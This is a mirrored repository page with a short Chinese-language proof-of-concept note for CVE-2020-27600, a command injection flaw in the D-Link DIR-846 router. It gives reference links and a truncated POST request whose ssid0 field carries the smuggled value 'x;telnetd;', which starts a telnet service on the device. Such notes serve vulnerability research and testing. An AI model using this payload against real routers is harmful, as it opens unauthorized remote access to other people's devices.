admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/D-Link DIR-846 命令注入漏洞 CVE-2020-27600.md

22 lines
530 B
Markdown
Raw Normal View History

更新漏洞
2022-12-06 17:17:54 +08:00
# D-Link DIR-846 命令注入漏洞 CVE-2020-27600
## 漏洞描述
D-Link DIR-846 A1_100.26 路由器中的HNAP1/control/SetMasterWLanSettings.php允许远程攻击者通过ssid0或ssid1参数进行执行任意命令。
参考链接:
- https://nvd.nist.gov/vuln/detail/CVE-2020-27600
- https://github.com/pwnninja/dlink/blob/main/DIR-846_SetMasterWLanSettingsCI.md
## 漏洞复现
需要登录Web控制台然后访问/Wireless.html无线设置页面。
```
POST /HNAPI HTTP/1.1
...
$data["ssid0"]="'x;telnetd;'"
```
Reference in New Issue Copy Permalink